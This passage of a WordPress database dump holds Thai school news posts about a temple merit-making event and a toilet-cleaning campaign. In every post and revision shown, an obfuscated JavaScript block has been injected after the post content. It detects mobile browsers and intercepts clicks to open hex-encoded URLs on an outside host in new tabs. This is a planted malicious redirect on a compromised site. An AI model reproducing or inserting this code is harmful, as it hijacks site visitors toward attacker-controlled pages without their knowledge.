_0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','วารสารประชาสัมพันธ์','','inherit','closed','closed','','408-revision-v1','','','2024-08-01 20:41:11','2024-08-01 13:41:11','',408,'http://pakhaeng.ssk.in.th/?p=410',0,'revision','',0),
(411,1,'2024-08-01 20:42:14','2024-08-01 13:42:14','<!-- wp:paragraph -->\n<p><strong>เมื่อวันที่ 9 เมษายนและวันที่ 18 เมษายน พ.ศ.2567 ผู้บริหาร พร้อมด้วยคณะครู</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>โรงเรียนบ้านหนองปลาเข็ง กอไหล่ ร่วมกับชุมชน ทำบุญถวายภัตตาหารเพลแด่พระสงฆ์ สามเณร ณ วัดบ้านหนองปลาเข็ง</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {\"id\":412,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/14-67-724x1024.png\" alt=\"\" class=\"wp-image-412\"/></figure>\n<!-- /wp:image -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','วารสารประสัมพันธ์','','publish','closed','closed','','%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c','','','2024-08-01 20:42:15','2024-08-01 13:42:15','',0,'http://pakhaeng.ssk.in.th/?p=411',0,'post','',0),
(412,1,'2024-08-01 20:42:00','2024-08-01 13:42:00','','14-67','','inherit','','closed','','14-67','','','2024-08-01 20:42:00','2024-08-01 13:42:00','',411,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/14-67.png',0,'attachment','image/png',0),
(413,1,'2024-08-01 20:42:14','2024-08-01 13:42:14','<!-- wp:paragraph -->\n<p><strong>เมื่อวันที่ 9 เมษายนและวันที่ 18 เมษายน พ.ศ.2567 ผู้บริหาร พร้อมด้วยคณะครู</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>โรงเรียนบ้านหนองปลาเข็ง กอไหล่ ร่วมกับชุมชน ทำบุญถวายภัตตาหารเพลแด่พระสงฆ์ สามเณร ณ วัดบ้านหนองปลาเข็ง</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {\"id\":412,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/14-67-724x1024.png\" alt=\"\" class=\"wp-image-412\"/></figure>\n<!-- /wp:image -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','วารสารประสัมพันธ์','','inherit','closed','closed','','411-revision-v1','','','2024-08-01 20:42:14','2024-08-01 13:42:14','',411,'http://pakhaeng.ssk.in.th/?p=413',0,'revision','',0),
(414,1,'2024-08-01 20:43:36','2024-08-01 13:43:36','<!-- wp:paragraph -->\n<p><strong>\"สุขาดี  มีความสุข\"</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>เมื่อวันที่ 6 พฤษภาคม พ.ศ.2567 นางเสน่หา พลโสภา ผู้อำนวยการโรงเรียน นำคณะครู และบุคลากรทางการศึกษา ร่วมสวมใส่เสื้อสีเหลือง ร่วมกันทำความสะอาดห้องสุขา ตามโครงการ “สุขาดี มีความสุข” ตามสนองนโยบาย สพฐ. เพื่อให้โรงเรียนมีห้องสุขา ที่สะอาด ถูกสุขลักษณะและปลอดภัย เพื่อให้พร้อมใช้กับตณะครู และนักเรียน</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {\"id\":415,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/15-67-724x1024.png\" alt=\"\" class=\"wp-image-415\"/></figure>\n<!-- /wp:image -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79